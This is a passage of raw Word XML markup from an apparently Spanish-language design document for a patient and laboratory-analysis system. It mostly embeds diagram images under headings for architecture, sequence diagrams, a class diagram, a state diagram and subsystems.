          <w:lang w:val="es-BO" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23731ECD" wp14:editId="12716FEC">
            <wp:extent cx="4580890" cy="3657600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1374650455" name="Imagen 1374650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0890" cy="3657600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRPr="00851A08" w:rsidRDefault="001B08E6" w:rsidP="001B08E6">
      <w:pPr>
        <w:pStyle w:val="Titulo4"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D8083F" w:rsidRDefault="00D8083F" w:rsidP="00D8083F"/>
    <w:p w:rsidR="00D8083F" w:rsidRDefault="00D8083F" w:rsidP="00D8083F"/>
    <w:p w:rsidR="00D8083F" w:rsidRDefault="00D8083F" w:rsidP="00D8083F"/>
    <w:p w:rsidR="001B08E6" w:rsidRDefault="001B08E6">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRDefault="001B08E6" w:rsidP="001B08E6">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="74" w:name="_Toc454371333"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Diseño</w:t>
      </w:r>
      <w:bookmarkEnd w:id="74"/>
    </w:p>
    <w:p w:rsidR="0074429D" w:rsidRPr="00686498" w:rsidRDefault="0074429D" w:rsidP="0074429D">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r>
        <w:t>Diseño de Arquitectura</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0074429D" w:rsidRDefault="0074429D" w:rsidP="0074429D">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:r>
        <w:t>Diseño Físico de Arquitectura</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0074429D" w:rsidRDefault="0074429D" w:rsidP="0074429D">
      <w:r w:rsidRPr="00E95B6E">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E83C2F2" wp14:editId="0FDA82B4">
            <wp:extent cx="5612130" cy="3715438"/>
            <wp:effectExtent l="0" t="0" r="762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3715438"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0074429D" w:rsidRDefault="0074429D" w:rsidP="0074429D"/>
    <w:p w:rsidR="0074429D" w:rsidRDefault="0074429D" w:rsidP="0074429D">
      <w:r w:rsidRPr="00A014EC">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CD4DD20" wp14:editId="1D33F523">
            <wp:extent cx="5612130" cy="2693370"/>
            <wp:effectExtent l="0" t="0" r="762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2693370"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0074429D" w:rsidRPr="00EB3DA9" w:rsidRDefault="0074429D" w:rsidP="0074429D"/>
    <w:p w:rsidR="0074429D" w:rsidRPr="00686498" w:rsidRDefault="0074429D" w:rsidP="009D0BAC">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="75" w:name="_Toc422314684"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Diseño de Casos de Uso</w:t>
      </w:r>
      <w:bookmarkEnd w:id="75"/>
    </w:p>
    <w:p w:rsidR="0074429D" w:rsidRDefault="0074429D" w:rsidP="009D0BAC">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:r>
        <w:t>Diagrama de secuencia</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0074429D" w:rsidRDefault="0074429D" w:rsidP="009D0BAC">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
      </w:pPr>
      <w:bookmarkStart w:id="76" w:name="_Toc405387616"/>
      <w:r w:rsidRPr="0070587C">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6D4FF164" wp14:editId="2EEC7394">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-56895</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>294308</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5314950" cy="5781675"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:wrapSquare wrapText="bothSides"/>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a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="4498" t="3600" r="3952" b="14899"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5314950" cy="578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Gestio</w:t>
      </w:r>
      <w:r w:rsidR="009D0BAC">
        <w:t>nar u</w:t>
      </w:r>
      <w:r>
        <w:t>suarios</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0074429D" w:rsidRDefault="0074429D" w:rsidP="0074429D"/>
    <w:p w:rsidR="0074429D" w:rsidRDefault="0074429D" w:rsidP="0074429D"/>
    <w:p w:rsidR="0074429D" w:rsidRDefault="0074429D" w:rsidP="0074429D"/>
    <w:p w:rsidR="0074429D" w:rsidRDefault="0074429D" w:rsidP="0074429D"/>
    <w:p w:rsidR="0074429D" w:rsidRDefault="0074429D" w:rsidP="0074429D"/>
    <w:p w:rsidR="0074429D" w:rsidRDefault="0074429D" w:rsidP="0074429D"/>
    <w:p w:rsidR="0074429D" w:rsidRDefault="0074429D" w:rsidP="0074429D"/>
    <w:p w:rsidR="0074429D" w:rsidRDefault="0074429D" w:rsidP="0074429D"/>
    <w:p w:rsidR="0074429D" w:rsidRDefault="0074429D" w:rsidP="0074429D"/>
    <w:p w:rsidR="0074429D" w:rsidRDefault="0074429D" w:rsidP="0074429D"/>
    <w:p w:rsidR="0074429D" w:rsidRDefault="0074429D" w:rsidP="0074429D"/>
    <w:p w:rsidR="0074429D" w:rsidRDefault="0074429D" w:rsidP="0074429D"/>
    <w:p w:rsidR="0074429D" w:rsidRDefault="0074429D" w:rsidP="0074429D"/>
    <w:p w:rsidR="0074429D" w:rsidRDefault="0074429D" w:rsidP="0074429D"/>
    <w:p w:rsidR="0074429D" w:rsidRDefault="0074429D" w:rsidP="0074429D"/>
    <w:p w:rsidR="0074429D" w:rsidRDefault="0074429D" w:rsidP="0074429D"/>
    <w:p w:rsidR="0074429D" w:rsidRDefault="0074429D" w:rsidP="0074429D"/>
    <w:p w:rsidR="0074429D" w:rsidRDefault="0074429D" w:rsidP="0074429D"/>
    <w:p w:rsidR="0074429D" w:rsidRDefault="0074429D" w:rsidP="0074429D"/>
    <w:p w:rsidR="0074429D" w:rsidRDefault="0074429D" w:rsidP="0074429D"/>
    <w:p w:rsidR="0074429D" w:rsidRDefault="0074429D" w:rsidP="0074429D"/>
    <w:p w:rsidR="0074429D" w:rsidRDefault="0074429D" w:rsidP="0074429D"/>
    <w:p w:rsidR="0074429D" w:rsidRDefault="0074429D" w:rsidP="0074429D"/>
    <w:p w:rsidR="0074429D" w:rsidRDefault="0074429D" w:rsidP="0074429D"/>
    <w:p w:rsidR="0074429D" w:rsidRPr="00F22FD7" w:rsidRDefault="0074429D" w:rsidP="0074429D"/>
    <w:bookmarkEnd w:id="76"/>
    <w:p w:rsidR="0074429D" w:rsidRPr="008618B1" w:rsidRDefault="009D0BAC" w:rsidP="0074429D">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Asignar p</w:t>
      </w:r>
      <w:r w:rsidR="0074429D">
        <w:t>rivilegios</w:t>
      </w:r>
      <w:r w:rsidR="0074429D" w:rsidRPr="008C3AFB">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251664384" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="04EE5006" wp14:editId="4580AFB9">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-232012</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>305445</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6103620" cy="5543550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21526"/>
                <wp:lineTo x="21506" y="21526"/>
                <wp:lineTo x="21506" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>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03620" cy="5543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0BAC" w:rsidRDefault="009D0BAC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="265F65" w:themeColor="accent2" w:themeShade="80"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0074429D" w:rsidRDefault="009D0BAC" w:rsidP="009D0BAC">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Gestionar p</w:t>
      </w:r>
      <w:r w:rsidR="0074429D">
        <w:t>aciente</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0074429D" w:rsidRDefault="0074429D" w:rsidP="0074429D">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B010367" wp14:editId="00EC5A1E">
            <wp:extent cx="5612130" cy="3021916"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="1374650493" name="Imagen 137465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3021916"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0074429D" w:rsidRPr="00F22FD7" w:rsidRDefault="0074429D" w:rsidP="0074429D"/>
    <w:p w:rsidR="0074429D" w:rsidRDefault="009D0BAC" w:rsidP="009D0BAC">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Gestionar r</w:t>
      </w:r>
      <w:r w:rsidR="0074429D">
        <w:t>esultados</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0074429D" w:rsidRDefault="0074429D" w:rsidP="0074429D">
      <w:r w:rsidRPr="00F9233C">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65F307C2" wp14:editId="377D8481">
            <wp:extent cx="5720024" cy="7073799"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1374650454" name="Imagen 137465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7">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="2462" t="3036" r="1278" b="2263"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5721236" cy="7075298"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0074429D" w:rsidRDefault="0074429D" w:rsidP="0074429D"/>
    <w:p w:rsidR="0074429D" w:rsidRDefault="0074429D" w:rsidP="0074429D"/>
    <w:p w:rsidR="0074429D" w:rsidRPr="00F22FD7" w:rsidRDefault="0074429D" w:rsidP="0074429D"/>
    <w:p w:rsidR="0074429D" w:rsidRPr="0075740D" w:rsidRDefault="0074429D" w:rsidP="0074429D"/>
    <w:p w:rsidR="0074429D" w:rsidRDefault="0074429D" w:rsidP="009D0BAC">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
      </w:pPr>
      <w:r w:rsidRPr="00686498">
        <w:t xml:space="preserve">Gestionar análisis </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0074429D" w:rsidRDefault="0074429D" w:rsidP="0074429D">
      <w:r w:rsidRPr="003B15E2">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65511956" wp14:editId="7345D53A">
            <wp:extent cx="5612130" cy="5765795"/>
            <wp:effectExtent l="0" t="0" r="7620" b="6985"/>
            <wp:docPr id="1374650474" name="Imagen 137465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5765795"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0074429D" w:rsidRDefault="0074429D" w:rsidP="0074429D">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0074429D" w:rsidRDefault="009D0BAC" w:rsidP="009D0BAC">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Parametrización de a</w:t>
      </w:r>
      <w:r w:rsidR="0074429D">
        <w:t>nálisis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0074429D" w:rsidRDefault="0074429D" w:rsidP="0074429D">
      <w:r w:rsidRPr="00F9233C">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5911FBDE" wp14:editId="21F85FC6">
            <wp:extent cx="5681938" cy="3305175"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1374650465" name="Imagen 137465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l="6155" t="5807" r="2642" b="4804"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5684769" cy="3306822"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0074429D" w:rsidRDefault="0074429D" w:rsidP="009D0BAC">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Recepción de Paciente </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0074429D" w:rsidRPr="003F09CE" w:rsidRDefault="0074429D" w:rsidP="0074429D">
      <w:r w:rsidRPr="007D500E">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B53D884" wp14:editId="3AA622C9">
            <wp:extent cx="6073602" cy="6448096"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="1374650453" name="Imagen 137465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76243" cy="6450900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0074429D" w:rsidRDefault="0074429D" w:rsidP="009D0BAC">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Personalizar Interfaz </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRDefault="0074429D" w:rsidP="001B08E6">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="129142E7" wp14:editId="69C04F23">
            <wp:extent cx="3086100" cy="1857375"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1374650495" name="Imagen 1374650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1">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect b="49482"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3086100" cy="1857375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D0BAC" w:rsidRDefault="009D0BAC" w:rsidP="001B08E6"/>
    <w:p w:rsidR="009D0BAC" w:rsidRDefault="00A64052" w:rsidP="00A64052">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Diagrama General de Clases</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D0BAC" w:rsidRDefault="00A64052" w:rsidP="009D0BAC">
      <w:r w:rsidRPr="00A64052">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="7800105" cy="5019800"/>
            <wp:effectExtent l="0" t="635"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7814756" cy="5029229"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A64052" w:rsidRDefault="00A64052" w:rsidP="00A64052">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="77" w:name="_Toc422314690"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Diagrama de Estado</w:t>
      </w:r>
      <w:bookmarkEnd w:id="77"/>
    </w:p>
    <w:p w:rsidR="00A64052" w:rsidRPr="00081D65" w:rsidRDefault="00A64052" w:rsidP="00A64052">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Gestionar recepción de </w:t>
      </w:r>
      <w:r w:rsidRPr="00A64052">
        <w:rPr>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>paciente</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A64052" w:rsidRDefault="00A64052" w:rsidP="00A64052">
      <w:r w:rsidRPr="00081D65">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40F741D6" wp14:editId="68A57BC4">
            <wp:extent cx="4600575" cy="6210300"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="1374650490" name="Imagen 137465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00575" cy="6210300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A64052" w:rsidRDefault="00A64052" w:rsidP="00A64052"/>
    <w:p w:rsidR="003A5812" w:rsidRDefault="003A5812">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A64052" w:rsidRDefault="003A5812" w:rsidP="003A5812">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Implementación </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A5812" w:rsidRDefault="003A5812" w:rsidP="003A5812">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r>
        <w:t>Implementación de la Arquitectura</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A5812" w:rsidRDefault="003A5812" w:rsidP="003A5812">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="78" w:name="_Toc405387678"/>
      <w:r>
        <w:t>Identificación de los componentes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="78"/>
    </w:p>
    <w:p w:rsidR="003A5812" w:rsidRDefault="003A5812" w:rsidP="003A5812">
      <w:r w:rsidRPr="00081ABD">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1BC94BA5" wp14:editId="1467C8BE">
            <wp:extent cx="6061818" cy="49625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63397" cy="4963818"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A5812" w:rsidRPr="0009585B" w:rsidRDefault="003A5812" w:rsidP="003A5812"/>
    <w:p w:rsidR="003A5812" w:rsidRDefault="003A5812" w:rsidP="003A5812">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkStart w:id="79" w:name="_Toc405387679"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Identificación de Subsistemas</w:t>
      </w:r>
      <w:bookmarkEnd w:id="79"/>
    </w:p>
    <w:p w:rsidR="003A5812" w:rsidRDefault="003A5812" w:rsidP="003A5812">
      <w:pPr>
        <w:pStyle w:val="Ttulo6"/>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:bookmarkStart w:id="80" w:name="_Toc405387681"/>
      <w:r>
        <w:t xml:space="preserve">Subsistema </w:t>
      </w:r>
      <w:bookmarkEnd w:id="80"/>
      <w:r>
        <w:t>Paciente</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A5812" w:rsidRPr="0019185F" w:rsidRDefault="003A5812" w:rsidP="003A5812">
      <w:r w:rsidRPr="0019185F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C8CE5A8" wp14:editId="7453468E">
            <wp:extent cx="7227791" cy="3741874"/>
            <wp:effectExtent l="9525" t="0" r="1905"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rot="16200000">
                      <a:off x="0" y="0"/>
                      <a:ext cx="7242065" cy="3749264"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A5812" w:rsidRPr="0066402E" w:rsidRDefault="003A5812" w:rsidP="003A5812">
      <w:pPr>
        <w:pStyle w:val="Ttulo6"/>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Subsistema Reporte</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A5812" w:rsidRPr="00AB6839" w:rsidRDefault="003A5812" w:rsidP="003A5812">
      <w:r w:rsidRPr="0019185F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39C69E69" wp14:editId="13B8007B">
            <wp:extent cx="7382700" cy="4085467"/>
            <wp:effectExtent l="0" t="8573" r="318" b="317"/>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rot="16200000">
                      <a:off x="0" y="0"/>
                      <a:ext cx="7386922" cy="4087803"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A5812" w:rsidRDefault="003A5812" w:rsidP="003A5812">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A5812" w:rsidRDefault="003A5812" w:rsidP="003A5812">
      <w:pPr>
        <w:pStyle w:val="Ttulo6"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Subsistema </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>An</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>á</w:t>
      </w:r>
      <w:r>
        <w:t>lisis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A5812" w:rsidRDefault="003A5812" w:rsidP="003A5812">
      <w:r w:rsidRPr="008F0641">
        <w:rPr>
          <w:noProof/>
